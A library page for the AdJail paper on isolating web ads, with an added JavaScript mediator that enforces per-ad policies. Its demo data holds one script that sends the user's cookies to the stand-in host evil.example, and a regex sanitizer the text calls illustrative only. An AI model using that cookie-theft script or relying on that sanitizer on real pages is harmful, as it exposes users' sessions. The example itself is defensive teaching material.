Article, DOI 10.5555/1929820.1929852

AdJail: practical enforcement of confidentiality and integrity policies on web advertisements

Published: 11 August 2010

Abstract

Web publishers frequently integrate third-party advertisements into web pages that also contain sensitive publisher data and end-user personal data. This practice exposes sensitive page content to confidentiality and integrity attacks launched by advertisements. In this paper, we propose a novel framework for addressing security threats posed by third-party advertisements. The heart of our framework is an innovative isolation mechanism that enables publishers to transparently interpose between advertisements and end users. The mechanism supports fine-grained policy specification and enforcement, and does not affect the user experience of interactive ads. Evaluation of our framework suggests compatibility with several mainstream ad networks, security from many threats from advertisements and acceptable performance overheads.
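As an added illustration of the interposition pattern the abstract describes (example code written for this page, not AdJail's implementation, and it makes no claim about how AdJail's own mechanism is built): the ad runs in a separate-origin frame, so it cannot touch the publisher page directly and must ask a publisher-controlled mediator for every read, write or navigation. The mediator accepts messages only from the frame origin registered for the ad slot, checks each request against a per-slot policy that confines reads and writes to the ad's own container (confidentiality for the rest of the page), and sanitizes markup before it reaches the page (integrity). The page model, policy, ad identifier, origins and request traffic are all constructed for the example, and the regex sanitizer stands in for a real HTML sanitizer; it is not one.

```javascript
// Added example (not AdJail's code): a publisher-side mediator that
// enforces a confidentiality/integrity policy on an isolated ad.
// The ad lives in a separate-origin frame and reaches the page only
// through messages; nothing below lets it touch the DOM directly.

// Constructed stand-in for the publisher's DOM (a real page would use
// document.querySelector on the nodes named here).
const page = {
  "#user-email": { text: "alice@example.com", html: "alice@example.com" },
  "#checkout":   { text: "Order total: $42",  html: "Order total: $42" },
  "#ad-slot-1":  { text: "",                  html: "" },
};

// Constructed publisher policy. Each ad slot names the only selectors
// the ad may read or write and the only hosts it may navigate to.
// Anything not listed is denied: default-deny, least privilege.
const policy = {
  "ad-1": {
    read: new Set(["#ad-slot-1"]),
    write: new Set(["#ad-slot-1"]),
    navigateHosts: new Set(["ads.example.net"]),
  },
};

// Origin expected on messages from each ad frame (constructed values).
// Checking event.origin is what stops any other page that can reach
// our window from impersonating the ad frame over postMessage.
const adOrigins = { "ad-1": "https://ad-1.ads-sandbox.example" };

// Integrity: remove markup that would run script in the publisher's
// origin if the ad's HTML were inserted there. Illustrative regex only;
// a production page would use a tree-based sanitizer.
function sanitizeHtml(html) {
  return html
    .replace(/<script\b[\s\S]*?<\/script\s*>/gi, "")
    .replace(/<\/?(iframe|object|embed)\b[^>]*>/gi, "")
    .replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, "")
    .replace(/\b(href|src)\s*=\s*(["']?)\s*javascript:[^"'\s>]*/gi, "$1=$2#");
}

// Apply the policy to one request from ad `adId`. Returns the result the
// mediator would post back to the ad frame.
function handleAdRequest(adId, req, dom = page) {
  const p = policy[adId];
  if (!p) return { ok: false, error: "unknown ad" };
  switch (req.op) {
    case "getText": // confidentiality: reads only inside the ad's own slot
      if (!p.read.has(req.selector)) return { ok: false, error: "read denied" };
      return { ok: true, value: dom[req.selector].text };
    case "setHTML": { // integrity: writes only inside the slot, and sanitized
      if (!p.write.has(req.selector)) return { ok: false, error: "write denied" };
      const clean = sanitizeHtml(String(req.html));
      dom[req.selector].html = clean;
      dom[req.selector].text = clean.replace(/<[^>]+>/g, "");
      return { ok: true, value: clean };
    }
    case "navigate": { // clicks may only go to the ad network's own hosts
      let host;
      try { host = new URL(req.url).host; } catch { return { ok: false, error: "bad url" }; }
      if (!p.navigateHosts.has(host)) return { ok: false, error: "navigation denied" };
      return { ok: true, value: req.url };
    }
    default:
      return { ok: false, error: "unknown op" };
  }
}

// Entry point for a window "message" event on the publisher page.
// The sender's origin, never a field inside the message, selects the policy.
function onAdMessage(event) {
  const adId = Object.keys(adOrigins).find((id) => adOrigins[id] === event.origin);
  if (!adId) return { ok: false, error: "untrusted origin" };
  return handleAdRequest(adId, event.data);
}

// Constructed traffic: a legitimate write carrying a script the sanitizer
// drops, an attempted read of user data, and a message from a foreign origin.
const demo = [
  { origin: "https://ad-1.ads-sandbox.example",
    data: { op: "setHTML", selector: "#ad-slot-1",
            html: '<b>Buy now</b><script>fetch("https://evil.example/?" + document.cookie)</script>' } },
  { origin: "https://ad-1.ads-sandbox.example", data: { op: "getText", selector: "#user-email" } },
  { origin: "https://evil.example", data: { op: "getText", selector: "#ad-slot-1" } },
];
function runDemo() { return demo.map(onAdMessage); }
console.log(JSON.stringify(runDemo(), null, 1));
```

Two design points carry over from the example to any real deployment: the policy is keyed by the verified origin of the frame, not by anything the ad sends, and the default for an unlisted selector, host or operation is denial. Interactive ads keep working because every legitimate action (render into the slot, follow a click to the ad network) has an allowed path through the mediator.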



      Published In

      USENIX Security'10: Proceedings of the 19th USENIX conference on Security
      August 2010
      30 pages
      ISBN:8887666655554

Sponsors

• National Science Foundation (NSF)
• Google Inc.
• IBM Research
• Microsoft Research
• RSA, The Security Division of EMC

Publisher

USENIX Association, United States

Cited By

• (2021) Containing Malicious Package Updates in npm with a Lightweight Permission System. Proceedings of the 43rd International Conference on Software Engineering, pp. 1334-1346. doi:10.1109/ICSE43902.2021.00121. Published 22 May 2021.
• (2019) ScriptProtect. Proceedings of the 2019 ACM Asia Conference on Computer and Communications Security, pp. 391-402. doi:10.1145/3321705.3329841. Published 2 July 2019.
• (2017) PAD: programming third-party web advertisement censorship. Proceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering, pp. 240-251. doi:10.5555/3155562.3155596. Published 30 October 2017.
• (2016) Content-based security for the web. Proceedings of the 2016 New Security Paradigms Workshop, pp. 49-60. doi:10.1145/3011883.3011890. Published 26 September 2016.
• (2016) A Study of Security Isolation Techniques. ACM Computing Surveys 49(3), pp. 1-37. doi:10.1145/2988545. Published 12 October 2016.
• (2016) Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security, pp. 853-864. doi:10.1145/2897845.2897899. Published 30 May 2016.
• (2016) JavaScript Sandboxing. Tutorial Lectures on Foundations of Security Analysis and Design VIII, volume 9808, pp. 32-86. doi:10.1007/978-3-319-43005-8_2. Published 1 June 2016.
• (2016) Comprehensive Analysis and Detection of Flash-Based Malware. Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, volume 9721, pp. 101-121. doi:10.1007/978-3-319-40667-1_6. Published 7 July 2016.
• (2015) JaTE. Proceedings of the 31st Annual Computer Security Applications Conference, pp. 151-160. doi:10.1145/2818000.2818019. Published 7 December 2015.
• (2015) Rethinking Security of Web-Based System Applications. Proceedings of the 24th International Conference on World Wide Web, pp. 366-376. doi:10.1145/2736277.2741663. Published 18 May 2015.
